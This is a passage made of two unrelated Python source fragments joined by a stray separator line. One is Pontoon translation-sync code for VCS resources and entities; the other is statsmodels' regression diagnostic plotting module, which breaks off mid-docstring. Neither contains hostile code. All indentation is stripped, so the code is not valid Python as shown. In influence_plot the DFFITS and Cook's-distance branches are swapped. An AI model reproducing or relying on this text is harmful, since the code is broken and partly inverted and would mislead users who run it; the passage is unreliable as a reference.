if not locales:
log.debug('Skipping unchanged file: {}'.format(path))
continue
else:
if (
self.changed_files is None or
path in self.obsolete_entities_paths or
path in self.new_paths
):
locales += self.locales
else:
locales += self.changed_files[path]
# Syncing resources
else:
if self.changed_files is not None and path not in self.changed_files:
log.debug('Skipping unchanged resource file: {}'.format(path))
continue
locales = []
locales = set([l for l in locales if l in self.locales])
map(self.synced_locales.add, locales)
log.debug(
'Detected resource file {} for {}'.format(
path, ','.join([l.code for l in locales]) or 'source'
)
)
try:
resources[path] = VCSResource(self, path, locales=locales)
except ParseError as err:
log.error('Skipping resource {path} due to ParseError: {err}'.format(
path=path, err=err
))
log.info('Changed files in {} repository: {}'.format(self.db_project, resources.keys()))
return resources
@property
def entities(self):
return chain.from_iterable(
resource.entities.values() for resource in self.resources.values()
)
@property
def checkout_path(self):
return self.db_project.checkout_path
@cached_property
def source_directory_path(self):
"""
Path to the directory where source strings are stored.
Paths are identified using a scoring system; more likely
directory names get higher scores, as do directories with
formats that only used for source strings.
"""
# If source repository explicitly marked
source_repository = self.db_project.source_repository
if source_repository.source_repo:
return source_repository.checkout_path
possible_sources = []
for root, dirnames, filenames in scandir.walk(self.checkout_path):
for dirname in dirnames:
if dirname in self.SOURCE_DIR_NAMES:
score = self.SOURCE_DIR_SCORES[dirname]
# Ensure the matched directory contains resources.
directory_path = os.path.join(root, dirname)
if directory_contains_resources(directory_path):
# Extra points for source resources!
if directory_contains_resources(directory_path, source_only=True):
score += 3
possible_sources.append((directory_path, score))
if possible_sources:
return max(possible_sources, key=lambda s: s[1])[0]
else:
raise MissingSourceDirectoryError(
'No source directory found for project {0}'.format(self.db_project.slug)
)
def relative_resource_paths(self):
"""
List of paths relative to the locale directories returned by
self.source_directory_path for each resource in this project.
"""
path = self.source_directory_path
for absolute_path in self.resources_for_path(path):
absolute_path = source_to_locale_path(absolute_path)
yield os.path.relpath(absolute_path, path)
def resources_for_path(self, path):
"""
List of paths for all supported resources found within the given
path.
"""
for root, dirnames, filenames in scandir.walk(path):
if is_hidden(root):
continue
# Ignore certain files in Mozilla repositories.
if self.db_project.repository_url in MOZILLA_REPOS:
filenames = [f for f in filenames if not f.endswith('region.properties')]
for filename in filenames:
if is_resource(filename):
yield os.path.join(root, filename)
class VCSResource(object):
"""Represents a single resource across multiple locales."""
def __init__(self, vcs_project, path, locales=None):
"""
Load the resource file for each enabled locale and store its
translations in VCSEntity instances.
"""
from pontoon.base.models import Locale
from pontoon.sync import formats # Avoid circular import.
self.vcs_project = vcs_project
self.path = path
self.locales = locales or []
self.files = {}
self.entities = {}
# Create entities using resources from the source directory,
source_resource_path = os.path.join(vcs_project.source_directory_path, self.path)
source_resource_path = locale_to_source_path(source_resource_path)
source_resource_file = formats.parse(
source_resource_path,
locale=Locale.objects.get(code='en-US')
)
for index, translation in enumerate(source_resource_file.translations):
vcs_entity = VCSEntity(
resource=self,
key=translation.key,
string=translation.source_string,
string_plural=translation.source_string_plural,
comments=translation.comments,
source=translation.source,
order=translation.order or index
)
self.entities[vcs_entity.key] = vcs_entity
# Fill in translations from the locale resources.
for locale in locales:
locale_directory = self.vcs_project.locale_directory_paths[locale.code]
resource_path = os.path.join(locale_directory, self.path)
log.debug('Parsing resource file: %s', resource_path)
try:
resource_file = formats.parse(resource_path, source_resource_path, locale)
except (IOError, ParseError):
continue # File doesn't exist or is invalid, let's move on
self.files[locale] = resource_file
log.debug('Discovered %s translations.', len(resource_file.translations))
for translation in resource_file.translations:
try:
self.entities[translation.key].translations[locale.code] = translation
except KeyError:
# If the source is missing an entity, we consider it
# deleted and don't add it.
pass
def save(self, locale=None):
"""
Save changes made to any of the translations in this resource
back to the filesystem for all locales.
"""
if locale:
self.files[locale].save(locale)
else:
for locale, resource_file in self.files.items():
resource_file.save(locale)
class VCSEntity(object):
"""
An Entity is a single string to be translated, and a VCSEntity
stores the translations for an entity from several locales.
"""
def __init__(self, resource, key, string, comments, source, string_plural='',
order=0):
self.resource = resource
self.key = key
self.string = string
self.string_plural = string_plural
self.translations = {}
self.comments = comments
self.source = source
self.order = order
def has_translation_for(self, locale_code):
"""Return True if a translation exists for the given locale."""
return locale_code in self.translations
class VCSTranslation(object):
"""
A single translation of a source string into another language.
Since a string can have different translations based on plural
forms, all of the different forms are stored under self.strings, a
dict where the keys equal possible values for
pontoon.base.models.Translation.plural_form and the values equal the
translation for that plural form.
"""
def __init__(
self, key, strings, comments, fuzzy,
source_string='',
source_string_plural='',
order=0,
source=None,
last_translator=None,
last_updated=None
):
self.key = key
self.source_string = source_string
self.source_string_plural = source_string_plural
self.strings = strings
self.comments = comments
self.fuzzy = fuzzy
self.order = order
self.source = source or []
self.last_translator = last_translator
self.last_updated = last_updated
@property
def extra(self):
"""
Return a dict of custom properties to store in the database.
Useful for subclasses from specific formats that have extra data
that needs to be preserved.
"""
return {}
def update_from_db(self, db_translations):
"""
Update translation with current DB state.
"""
# If no DB translations are fuzzy, set fuzzy to False.
# Otherwise, it's true.
self.fuzzy = any(t for t in db_translations if t.fuzzy)
if len(db_translations) > 0:
last_translation = max(
db_translations,
key=lambda t: t.date or timezone.make_aware(datetime.min)
)
self.last_updated = last_translation.date
self.last_translator = last_translation.user
# Replace existing translations with ones from the database.
self.strings = {
db.plural_form: db.string for db in db_translations
}
| |
'''Partial Regression plot and residual plots to find misspecification
Author: Josef Perktold
License: BSD-3
Created: 2011-01-23
update
2011-06-05 : start to convert example to usable functions
2011-10-27 : docstrings
'''
from statsmodels.compat.python import lrange, string_types, lzip, range
import numpy as np
import pandas as pd
from patsy import dmatrix
from statsmodels.regression.linear_model import OLS, GLS, WLS
from statsmodels.genmod.generalized_linear_model import GLM
from statsmodels.genmod.generalized_estimating_equations import GEE
from statsmodels.sandbox.regression.predstd import wls_prediction_std
from statsmodels.graphics import utils
from statsmodels.nonparametric.smoothers_lowess import lowess
from statsmodels.tools.tools import maybe_unwrap_results
from statsmodels.base import model
from ._regressionplots_doc import (
_plot_added_variable_doc,
_plot_partial_residuals_doc,
_plot_ceres_residuals_doc)
__all__ = ['plot_fit', 'plot_regress_exog', 'plot_partregress', 'plot_ccpr',
'plot_regress_exog', 'plot_partregress_grid', 'plot_ccpr_grid',
'add_lowess', 'abline_plot', 'influence_plot',
'plot_leverage_resid2', 'added_variable_resids',
'partial_resids', 'ceres_resids', 'plot_added_variable',
'plot_partial_residuals', 'plot_ceres_residuals']
#TODO: consider moving to influence module
def _high_leverage(results):
#TODO: replace 1 with k_constant
return 2. * (results.df_model + 1)/results.nobs
def add_lowess(ax, lines_idx=0, frac=.2, **lowess_kwargs):
"""
Add Lowess line to a plot.
Parameters
----------
ax : matplotlib Axes instance
The Axes to which to add the plot
lines_idx : int
This is the line on the existing plot to which you want to add
a smoothed lowess line.
frac : float
The fraction of the points to use when doing the lowess fit.
lowess_kwargs
Additional keyword arguments are passes to lowess.
Returns
-------
fig : matplotlib Figure instance
The figure that holds the instance.
"""
y0 = ax.get_lines()[lines_idx]._y
x0 = ax.get_lines()[lines_idx]._x
lres = lowess(y0, x0, frac=frac, **lowess_kwargs)
ax.plot(lres[:, 0], lres[:, 1], 'r', lw=1.5)
return ax.figure
def plot_fit(results, exog_idx, y_true=None, ax=None, **kwargs):
"""Plot fit against one regressor.
This creates one graph with the scatterplot of observed values compared to
fitted values.
Parameters
----------
results : result instance
result instance with resid, model.endog and model.exog as attributes
x_var : int or str
Name or index of regressor in exog matrix.
y_true : array_like
(optional) If this is not None, then the array is added to the plot
ax : Matplotlib AxesSubplot instance, optional
If given, this subplot is used to plot in instead of a new figure being
created.
kwargs
The keyword arguments are passed to the plot command for the fitted
values points.
Returns
-------
fig : Matplotlib figure instance
If `ax` is None, the created figure. Otherwise the figure to which
`ax` is connected.
Examples
--------
Load the Statewide Crime data set and perform linear regression with
`poverty` and `hs_grad` as variables and `murder` as the response
>>> import statsmodels.api as sm
>>> import matplotlib.pyplot as plt
>>> data = sm.datasets.statecrime.load_pandas().data
>>> murder = data['murder']
>>> X = data[['poverty', 'hs_grad']]
>>> X["constant"] = 1
>>> y = murder
>>> model = sm.OLS(y, X)
>>> results = model.fit()
Create a plot just for the variable 'Poverty':
>>> fig, ax = plt.subplots()
>>> fig = sm.graphics.plot_fit(results, 0, ax=ax)
>>> ax.set_ylabel("Murder Rate")
>>> ax.set_xlabel("Poverty Level")
>>> ax.set_title("Linear Regression")
>>> plt.show()
.. plot:: plots/graphics_plot_fit_ex.py
"""
fig, ax = utils.create_mpl_ax(ax)
exog_name, exog_idx = utils.maybe_name_or_idx(exog_idx, results.model)
results = maybe_unwrap_results(results)
#maybe add option for wendog, wexog
y = results.model.endog
x1 = results.model.exog[:, exog_idx]
x1_argsort = np.argsort(x1)
y = y[x1_argsort]
x1 = x1[x1_argsort]
ax.plot(x1, y, 'bo', label=results.model.endog_names)
if not y_true is None:
ax.plot(x1, y_true[x1_argsort], 'b-', label='True values')
title = 'Fitted values versus %s' % exog_name
prstd, iv_l, iv_u = wls_prediction_std(results)
ax.plot(x1, results.fittedvalues[x1_argsort], 'D', color='r',
label='fitted', **kwargs)
ax.vlines(x1, iv_l[x1_argsort], iv_u[x1_argsort], linewidth=1, color='k',
alpha=.7)
#ax.fill_between(x1, iv_l[x1_argsort], iv_u[x1_argsort], alpha=0.1,
# color='k')
ax.set_title(title)
ax.set_xlabel(exog_name)
ax.set_ylabel(results.model.endog_names)
ax.legend(loc='best', numpoints=1)
return fig
def plot_regress_exog(results, exog_idx, fig=None):
"""Plot regression results against one regressor.
This plots four graphs in a 2 by 2 figure: 'endog versus exog',
'residuals versus exog', 'fitted versus exog' and
'fitted plus residual versus exog'
Parameters
----------
results : result instance
result instance with resid, model.endog and model.exog as attributes
exog_idx : int
index of regressor in exog matrix
fig : Matplotlib figure instance, optional
If given, this figure is simply returned. Otherwise a new figure is
created.
Returns
-------
fig : matplotlib figure instance
"""
fig = utils.create_mpl_fig(fig)
exog_name, exog_idx = utils.maybe_name_or_idx(exog_idx, results.model)
results = maybe_unwrap_results(results)
#maybe add option for wendog, wexog
y_name = results.model.endog_names
x1 = results.model.exog[:, exog_idx]
prstd, iv_l, iv_u = wls_prediction_std(results)
ax = fig.add_subplot(2, 2, 1)
ax.plot(x1, results.model.endog, 'o', color='b', alpha=0.9, label=y_name)
ax.plot(x1, results.fittedvalues, 'D', color='r', label='fitted',
alpha=.5)
ax.vlines(x1, iv_l, iv_u, linewidth=1, color='k', alpha=.7)
ax.set_title('Y and Fitted vs. X', fontsize='large')
ax.set_xlabel(exog_name)
ax.set_ylabel(y_name)
ax.legend(loc='best')
ax = fig.add_subplot(2, 2, 2)
ax.plot(x1, results.resid, 'o')
ax.axhline(y=0, color='black')
ax.set_title('Residuals versus %s' % exog_name, fontsize='large')
ax.set_xlabel(exog_name)
ax.set_ylabel("resid")
ax = fig.add_subplot(2, 2, 3)
exog_noti = np.ones(results.model.exog.shape[1], bool)
exog_noti[exog_idx] = False
exog_others = results.model.exog[:, exog_noti]
from pandas import Series
fig = plot_partregress(results.model.data.orig_endog,
Series(x1, name=exog_name,
index=results.model.data.row_labels),
exog_others, obs_labels=False, ax=ax)
ax.set_title('Partial regression plot', fontsize='large')
#ax.set_ylabel("Fitted values")
#ax.set_xlabel(exog_name)
ax = fig.add_subplot(2, 2, 4)
fig = plot_ccpr(results, exog_idx, ax=ax)
ax.set_title('CCPR Plot', fontsize='large')
#ax.set_xlabel(exog_name)
#ax.set_ylabel("Fitted values + resids")
fig.suptitle('Regression Plots for %s' % exog_name, fontsize="large")
fig.tight_layout()
fig.subplots_adjust(top=.90)
return fig
def _partial_regression(endog, exog_i, exog_others):
"""Partial regression.
regress endog on exog_i conditional on exog_others
uses OLS
Parameters
----------
endog : array_like
exog : array_like
exog_others : array_like
Returns
-------
res1c : OLS results instance
(res1a, res1b) : tuple of OLS results instances
results from regression of endog on exog_others and of exog_i on
exog_others
"""
#FIXME: This function doesn't appear to be used.
res1a = OLS(endog, exog_others).fit()
res1b = OLS(exog_i, exog_others).fit()
res1c = OLS(res1a.resid, res1b.resid).fit()
return res1c, (res1a, res1b)
def plot_partregress(endog, exog_i, exog_others, data=None,
title_kwargs={}, obs_labels=True, label_kwargs={},
ax=None, ret_coords=False, **kwargs):
"""Plot partial regression for a single regressor.
Parameters
----------
endog : ndarray or string
endogenous or response variable. If string is given, you can use a
arbitrary translations as with a formula.
exog_i : ndarray or string
exogenous, explanatory variable. If string is given, you can use a
arbitrary translations as with a formula.
exog_others : ndarray or list of strings
other exogenous, explanatory variables. If a list of strings is given,
each item is a term in formula. You can use a arbitrary translations
as with a formula. The effect of these variables will be removed by
OLS regression.
data : DataFrame, dict, or recarray
Some kind of data structure with names if the other variables are
given as strings.
title_kwargs : dict
Keyword arguments to pass on for the title. The key to control the
fonts is fontdict.
obs_labels : bool or array-like
Whether or not to annotate the plot points with their observation
labels. If obs_labels is a boolean, the point labels will try to do
the right thing. First it will try to use the index of data, then
fall back to the index of exog_i. Alternatively, you may give an
array-like object corresponding to the obseveration numbers.
labels_kwargs : dict
Keyword arguments that control annotate for the observation labels.
ax : Matplotlib AxesSubplot instance, optional
If given, this subplot is used to plot in instead of a new figure being
created.
ret_coords : bool
If True will return the coordinates of the points in the plot. You
can use this to add your own annotations.
kwargs
The keyword arguments passed to plot for the points.
Returns
-------
fig : Matplotlib figure instance
If `ax` is None, the created figure. Otherwise the figure to which
`ax` is connected.
coords : list, optional
If ret_coords is True, return a tuple of arrays (x_coords, y_coords).
Notes
-----
The slope of the fitted line is the that of `exog_i` in the full
multiple regression. The individual points can be used to assess the
influence of points on the estimated coefficient.
See Also
--------
plot_partregress_grid : Plot partial regression for a set of regressors.
"""
#NOTE: there is no interaction between possible missing data and
#obs_labels yet, so this will need to be tweaked a bit for this case
fig, ax = utils.create_mpl_ax(ax)
# strings, use patsy to transform to data
if isinstance(endog, string_types):
endog = dmatrix(endog + "-1", data)
if isinstance(exog_others, string_types):
RHS = dmatrix(exog_others, data)
elif isinstance(exog_others, list):
RHS = "+".join(exog_others)
RHS = dmatrix(RHS, data)
else:
RHS = exog_others
RHS_isemtpy = False
if isinstance(RHS, np.ndarray) and RHS.size==0:
RHS_isemtpy = True
elif isinstance(RHS, pd.DataFrame) and RHS.empty:
RHS_isemtpy = True
if isinstance(exog_i, string_types):
exog_i = dmatrix(exog_i + "-1", data)
# all arrays or pandas-like
if RHS_isemtpy:
ax.plot(endog, exog_i, 'o', **kwargs)
fitted_line = OLS(endog, exog_i).fit()
x_axis_endog_name = 'x' if isinstance(exog_i, np.ndarray) else exog_i.name
y_axis_endog_name = 'y' if isinstance(endog, np.ndarray) else endog.design_info.column_names[0]
else:
res_yaxis = OLS(endog, RHS).fit()
res_xaxis = OLS(exog_i, RHS).fit()
xaxis_resid = res_xaxis.resid
yaxis_resid = res_yaxis.resid
x_axis_endog_name = res_xaxis.model.endog_names
y_axis_endog_name = res_yaxis.model.endog_names
ax.plot(xaxis_resid, yaxis_resid, 'o', **kwargs)
fitted_line = OLS(yaxis_resid, xaxis_resid).fit()
fig = abline_plot(0, fitted_line.params[0], color='k', ax=ax)
if x_axis_endog_name == 'y': # for no names regression will just get a y
x_axis_endog_name = 'x' # this is misleading, so use x
ax.set_xlabel("e(%s | X)" % x_axis_endog_name)
ax.set_ylabel("e(%s | X)" % y_axis_endog_name)
ax.set_title('Partial Regression Plot', **title_kwargs)
#NOTE: if we want to get super fancy, we could annotate if a point is
#clicked using this widget
#http://stackoverflow.com/questions/4652439/
#is-there-a-matplotlib-equivalent-of-matlabs-datacursormode/
#4674445#4674445
if obs_labels is True:
if data is not None:
obs_labels = data.index
elif hasattr(exog_i, "index"):
obs_labels = exog_i.index
else:
obs_labels = res_xaxis.model.data.row_labels
#NOTE: row_labels can be None.
#Maybe we should fix this to never be the case.
if obs_labels is None:
obs_labels = lrange(len(exog_i))
if obs_labels is not False: # could be array-like
if len(obs_labels) != len(exog_i):
raise ValueError("obs_labels does not match length of exog_i")
label_kwargs.update(dict(ha="center", va="bottom"))
ax = utils.annotate_axes(lrange(len(obs_labels)), obs_labels,
lzip(res_xaxis.resid, res_yaxis.resid),
[(0, 5)] * len(obs_labels), "x-large", ax=ax,
**label_kwargs)
if ret_coords:
return fig, (res_xaxis.resid, res_yaxis.resid)
else:
return fig
def plot_partregress_grid(results, exog_idx=None, grid=None, fig=None):
"""Plot partial regression for a set of regressors.
Parameters
----------
results : results instance
A regression model results instance
exog_idx : None, list of ints, list of strings
(column) indices of the exog used in the plot, default is all.
grid : None or tuple of int (nrows, ncols)
If grid is given, then it is used for the arrangement of the subplots.
If grid is None, then ncol is one, if there are only 2 subplots, and
the number of columns is two otherwise.
fig : Matplotlib figure instance, optional
If given, this figure is simply returned. Otherwise a new figure is
created.
Returns
-------
fig : Matplotlib figure instance
If `fig` is None, the created figure. Otherwise `fig` itself.
Notes
-----
A subplot is created for each explanatory variable given by exog_idx.
The partial regression plot shows the relationship between the response
and the given explanatory variable after removing the effect of all other
explanatory variables in exog.
See Also
--------
plot_partregress : Plot partial regression for a single regressor.
plot_ccpr
References
----------
See http://www.itl.nist.gov/div898/software/dataplot/refman1/auxillar/partregr.htm
"""
import pandas
fig = utils.create_mpl_fig(fig)
exog_name, exog_idx = utils.maybe_name_or_idx(exog_idx, results.model)
#maybe add option for using wendog, wexog instead
y = pandas.Series(results.model.endog, name=results.model.endog_names)
exog = results.model.exog
k_vars = exog.shape[1]
#this function doesn't make sense if k_vars=1
if not grid is None:
nrows, ncols = grid
else:
if len(exog_idx) > 2:
nrows = int(np.ceil(len(exog_idx)/2.))
ncols = 2
title_kwargs = {"fontdict" : {"fontsize" : 'small'}}
else:
nrows = len(exog_idx)
ncols = 1
title_kwargs = {}
# for indexing purposes
other_names = np.array(results.model.exog_names)
for i, idx in enumerate(exog_idx):
others = lrange(k_vars)
others.pop(idx)
exog_others = pandas.DataFrame(exog[:, others],
columns=other_names[others])
ax = fig.add_subplot(nrows, ncols, i+1)
plot_partregress(y, pandas.Series(exog[:, idx],
name=other_names[idx]),
exog_others, ax=ax, title_kwargs=title_kwargs,
obs_labels=False)
ax.set_title("")
fig.suptitle("Partial Regression Plot", fontsize="large")
fig.tight_layout()
fig.subplots_adjust(top=.95)
return fig
def plot_ccpr(results, exog_idx, ax=None):
"""Plot CCPR against one regressor.
Generates a CCPR (component and component-plus-residual) plot.
Parameters
----------
results : result instance
A regression results instance.
exog_idx : int or string
Exogenous, explanatory variable. If string is given, it should
be the variable name that you want to use, and you can use arbitrary
translations as with a formula.
ax : Matplotlib AxesSubplot instance, optional
If given, it is used to plot in instead of a new figure being
created.
Returns
-------
fig : Matplotlib figure instance
If `ax` is None, the created figure. Otherwise the figure to which
`ax` is connected.
See Also
--------
plot_ccpr_grid : Creates CCPR plot for multiple regressors in a plot grid.
Notes
-----
The CCPR plot provides a way to judge the effect of one regressor on the
response variable by taking into account the effects of the other
independent variables. The partial residuals plot is defined as
Residuals + B_i*X_i versus X_i. The component adds the B_i*X_i versus
X_i to show where the fitted line would lie. Care should be taken if X_i
is highly correlated with any of the other independent variables. If this
is the case, the variance evident in the plot will be an underestimate of
the true variance.
References
----------
http://www.itl.nist.gov/div898/software/dataplot/refman1/auxillar/ccpr.htm
"""
fig, ax = utils.create_mpl_ax(ax)
exog_name, exog_idx = utils.maybe_name_or_idx(exog_idx, results.model)
results = maybe_unwrap_results(results)
x1 = results.model.exog[:, exog_idx]
#namestr = ' for %s' % self.name if self.name else ''
x1beta = x1*results.params[exog_idx]
ax.plot(x1, x1beta + results.resid, 'o')
from statsmodels.tools.tools import add_constant
mod = OLS(x1beta, add_constant(x1)).fit()
params = mod.params
fig = abline_plot(*params, **dict(ax=ax))
#ax.plot(x1, x1beta, '-')
ax.set_title('Component and component plus residual plot')
ax.set_ylabel("Residual + %s*beta_%d" % (exog_name, exog_idx))
ax.set_xlabel("%s" % exog_name)
return fig
def plot_ccpr_grid(results, exog_idx=None, grid=None, fig=None):
"""Generate CCPR plots against a set of regressors, plot in a grid.
Generates a grid of CCPR (component and component-plus-residual) plots.
Parameters
----------
results : result instance
uses exog and params of the result instance
exog_idx : None or list of int
(column) indices of the exog used in the plot
grid : None or tuple of int (nrows, ncols)
If grid is given, then it is used for the arrangement of the subplots.
If grid is None, then ncol is one, if there are only 2 subplots, and
the number of columns is two otherwise.
fig : Matplotlib figure instance, optional
If given, this figure is simply returned. Otherwise a new figure is
created.
Returns
-------
fig : Matplotlib figure instance
If `ax` is None, the created figure. Otherwise the figure to which
`ax` is connected.
Notes
-----
Partial residual plots are formed as::
Res + Betahat(i)*Xi versus Xi
and CCPR adds::
Betahat(i)*Xi versus Xi
See Also
--------
plot_ccpr : Creates CCPR plot for a single regressor.
References
----------
See http://www.itl.nist.gov/div898/software/dataplot/refman1/auxillar/ccpr.htm
"""
fig = utils.create_mpl_fig(fig)
exog_name, exog_idx = utils.maybe_name_or_idx(exog_idx, results.model)
if grid is not None:
nrows, ncols = grid
else:
if len(exog_idx) > 2:
nrows = int(np.ceil(len(exog_idx)/2.))
ncols = 2
else:
nrows = len(exog_idx)
ncols = 1
seen_constant = 0
for i, idx in enumerate(exog_idx):
if results.model.exog[:, idx].var() == 0:
seen_constant = 1
continue
ax = fig.add_subplot(nrows, ncols, i+1-seen_constant)
fig = plot_ccpr(results, exog_idx=idx, ax=ax)
ax.set_title("")
fig.suptitle("Component-Component Plus Residual Plot", fontsize="large")
fig.tight_layout()
fig.subplots_adjust(top=.95)
return fig
def abline_plot(intercept=None, slope=None, horiz=None, vert=None,
model_results=None, ax=None, **kwargs):
"""
Plots a line given an intercept and slope.
intercept : float
The intercept of the line
slope : float
The slope of the line
horiz : float or array-like
Data for horizontal lines on the y-axis
vert : array-like
Data for verterical lines on the x-axis
model_results : statsmodels results instance
Any object that has a two-value `params` attribute. Assumed that it
is (intercept, slope)
ax : axes, optional
Matplotlib axes instance
kwargs
Options passed to matplotlib.pyplot.plt
Returns
-------
fig : Figure
The figure given by `ax.figure` or a new instance.
Examples
--------
>>> import numpy as np
>>> import statsmodels.api as sm
>>> np.random.seed(12345)
>>> X = sm.add_constant(np.random.normal(0, 20, size=30))
>>> y = np.dot(X, [25, 3.5]) + np.random.normal(0, 30, size=30)
>>> mod = sm.OLS(y,X).fit()
>>> fig = sm.graphics.abline_plot(model_results=mod)
>>> ax = fig.axes[0]
>>> ax.scatter(X[:,1], y)
>>> ax.margins(.1)
>>> import matplotlib.pyplot as plt
>>> plt.show()
"""
if ax is not None: # get axis limits first thing, don't change these
x = ax.get_xlim()
else:
x = None
fig, ax = utils.create_mpl_ax(ax)
if model_results:
intercept, slope = model_results.params
if x is None:
x = [model_results.model.exog[:, 1].min(),
model_results.model.exog[:, 1].max()]
else:
if not (intercept is not None and slope is not None):
raise ValueError("specify slope and intercepty or model_results")
if x is None:
x = ax.get_xlim()
data_y = [x[0]*slope+intercept, x[1]*slope+intercept]
ax.set_xlim(x)
#ax.set_ylim(y)
from matplotlib.lines import Line2D
class ABLine2D(Line2D):
def update_datalim(self, ax):
ax.set_autoscale_on(False)
children = ax.get_children()
abline = [children[i] for i in range(len(children))
if isinstance(children[i], ABLine2D)][0]
x = ax.get_xlim()
y = [x[0]*slope+intercept, x[1]*slope+intercept]
abline.set_data(x, y)
ax.figure.canvas.draw()
#TODO: how to intercept something like a margins call and adjust?
line = ABLine2D(x, data_y, **kwargs)
ax.add_line(line)
ax.callbacks.connect('xlim_changed', line.update_datalim)
ax.callbacks.connect('ylim_changed', line.update_datalim)
if horiz:
ax.hline(horiz)
if vert:
ax.vline(vert)
return fig
def influence_plot(results, external=True, alpha=.05, criterion="cooks",
size=48, plot_alpha=.75, ax=None, **kwargs):
"""
Plot of influence in regression. Plots studentized resids vs. leverage.
Parameters
----------
results : results instance
A fitted model.
external : bool
Whether to use externally or internally studentized residuals. It is
recommended to leave external as True.
alpha : float
The alpha value to identify large studentized residuals. Large means
abs(resid_studentized) > t.ppf(1-alpha/2, dof=results.df_resid)
criterion : str {'DFFITS', 'Cooks'}
Which criterion to base the size of the points on. Options are
DFFITS or Cook's D.
size : float
The range of `criterion` is mapped to 10**2 - size**2 in points.
plot_alpha : float
The `alpha` of the plotted points.
ax : matplotlib Axes instance
An instance of a matplotlib Axes.
Returns
-------
fig : matplotlib figure
The matplotlib figure that contains the Axes.
Notes
-----
Row labels for the observations in which the leverage, measured by the
diagonal of the hat matrix, is high or the residuals are large, as the
combination of large residuals and a high influence value indicates an
influence point. The value of large residuals can be controlled using the
`alpha` parameter. Large leverage points are identified as
hat_i > 2 * (df_model + 1)/nobs.
"""
fig, ax = utils.create_mpl_ax(ax)
infl = results.get_influence()
if criterion.lower().startswith('dff'):
psize = infl.cooks_distance[0]
elif criterion.lower().startswith('coo'):
psize = np.abs(infl.dffits[0])
else:
raise ValueError("Criterion %s not understood" % criterion)
# scale the variables
#TODO: what is the correct scaling and the assumption here?
#we want plots to be comparable across different plots
#so we would need to use the expected distribution of criterion probably
old_range = np.ptp(psize)
new_range = size**2 - 8**2
psize = (psize - psize.min()) * new_range/old_range + 8**2
leverage = infl.hat_matrix_diag
if external:
resids = infl.resid_studentized_external
else:
resids = infl.resid_studentized_internal
from scipy import stats
cutoff = stats.t.ppf(1.-alpha/2, results.df_resid)
large_resid = np.abs(resids) > cutoff
large_leverage = leverage > _high_leverage(results)
large_points = np.logical_or(large_resid, large_leverage)
ax.scatter(leverage, resids, s=psize, alpha=plot_alpha)
# add point labels
labels = results.model.data.row_labels
if labels is None:
labels = lrange(len(resids))
ax = utils.annotate_axes(np.where(large_points)[0], labels,
lzip(leverage, resids),
lzip(-(psize/2)**.5, (psize/2)**.5), "x-large",
ax)
#TODO: make configurable or let people do it ex-post?
font = {"fontsize" : 16, "color" : "black"}
ax.set_ylabel("Studentized Residuals", **font)
ax.set_xlabel("H Leverage", **font)
ax.set_title("Influence Plot", **font)
return fig
def plot_leverage_resid2(results, alpha=.05, label_kwargs={}, ax=None,
**kwargs):
"""
Plots leverage statistics vs. normalized residuals squared
Parameters
----------
results : results instance
A regression results instance
alpha : float
Specifies the cut-off for large-standardized residuals. Residuals
are assumed to be distributed N(0, 1) with alpha=alpha.
label_kwargs : dict
The keywords to pass to annotate for the labels.
ax : Axes instance
Matplotlib Axes instance
Returns
-------
fig : matplotlib Figure
A matplotlib figure instance.
"""
from scipy.stats import zscore, norm
fig, ax = utils.create_mpl_ax(ax)
infl = results.get_influence()
leverage = infl.hat_matrix_diag
resid = zscore(results.resid)
ax.plot(resid**2, leverage, 'o', **kwargs)
ax.set_xlabel("Normalized residuals**2")
ax.set_ylabel("Leverage")
ax.set_title("Leverage vs. Normalized residuals squared")
large_leverage = leverage > _high_leverage(results)
#norm or t here if standardized?
cutoff = norm.ppf(1.-alpha/2)
large_resid = np.abs(resid) > cutoff
labels = results.model.data.row_labels
if labels is None:
labels = lrange(results.nobs)
index = np.where(np.logical_or(large_leverage, large_resid))[0]
ax = utils.annotate_axes(index, labels, lzip(resid**2, leverage),
[(0, 5)]*int(results.nobs), "large",
ax=ax, ha="center", va="bottom")
ax.margins(.075, .075)
return fig
def plot_added_variable(results, focus_exog, resid_type=None,
use_glm_weights=True, fit_kwargs=None, ax=None):
# Docstring attached below
model = results.model
fig, ax = utils.create_mpl_ax(ax)
endog_resid, focus_exog_resid =\
added_variable_resids(results, focus_exog,
resid_type=resid_type,
use_glm_weights=use_glm_weights,
fit_kwargs=fit_kwargs)
ax.plot(focus_exog_resid, endog_resid, 'o', alpha=0.6)
ax.set_title('Added variable plot', fontsize='large')
if type(focus_exog) is str:
xname = focus_exog
else:
xname = model.exog_names[focus_exog]
ax.set_xlabel(xname, size=15)
ax.set_ylabel(model.endog_names + " residuals", size=15)
return fig
plot_added_variable.__doc__ = _plot_added_variable_doc % {
'extra_params_doc' : "results: object\n\tResults for a fitted regression model"}
def plot_partial_residuals(results, focus_exog, ax=None):
# Docstring attached below
model = results.model
focus_exog, focus_col = utils.maybe_name_or_idx(focus_exog, model)
pr = partial_resids(results, focus_exog)
focus_exog_vals = results.model.exog[:, focus_col]
fig, ax = utils.create_mpl_ax(ax)
ax.plot(focus_exog_vals, pr, 'o', alpha=0.6)
ax.set_title('Partial residuals plot', fontsize='large')
if type(focus_exog) is str:
xname = focus_exog
else:
xname = model.exog_names[focus_exog]
ax.set_xlabel(xname, size=15)
ax.set_ylabel("Component plus residual", size=15)
return fig
plot_partial_residuals.__doc__ = _plot_partial_residuals_doc % {
'extra_params_doc' : "results: object\n\tResults for a fitted regression model"}
def plot_ceres_residuals(results, focus_exog, frac=0.66, cond_means=None,
ax=None):
# Docstring attached below
model = results.model
focus_exog, focus_col = utils.maybe_name_or_idx(focus_exog, model)
presid = ceres_resids(results, focus_exog, frac=frac,
cond_means=cond_means)
focus_exog_vals = model.exog[:, focus_col]
fig, ax = utils.create_mpl_ax(ax)
ax.plot(focus_exog_vals, presid, 'o', alpha=0.6)
ax.set_title('CERES residuals plot', fontsize='large')
ax.set_xlabel(focus_exog, size=15)
ax.set_ylabel("Component plus residual", size=15)
return fig
plot_ceres_residuals.__doc__ = _plot_ceres_residuals_doc % {
'extra_params_doc' : "results: object\n\tResults for a fitted regression model"}
def ceres_resids(results, focus_exog, frac=0.66, cond_means=None):
"""
Calculate the CERES residuals (Conditional Expectation Partial
Residuals) for a fitted model.
Parameters
----------
results : model results instance
The fitted model for which the CERES residuals are calculated.
focus_exog : int
The column of results.model.exog used as the 'focus variable'.
frac : float, optional
Lowess smoothing parameter for estimating the conditional
means. Not used if `cond_means` is provided.
cond_means : array-like, optional
If provided, the columns of this array are the conditional
means E[exog | focus exog], where exog ranges over some
or all of the columns of exog other than focus exog. If
this is an empty nx0 array, the conditional means are
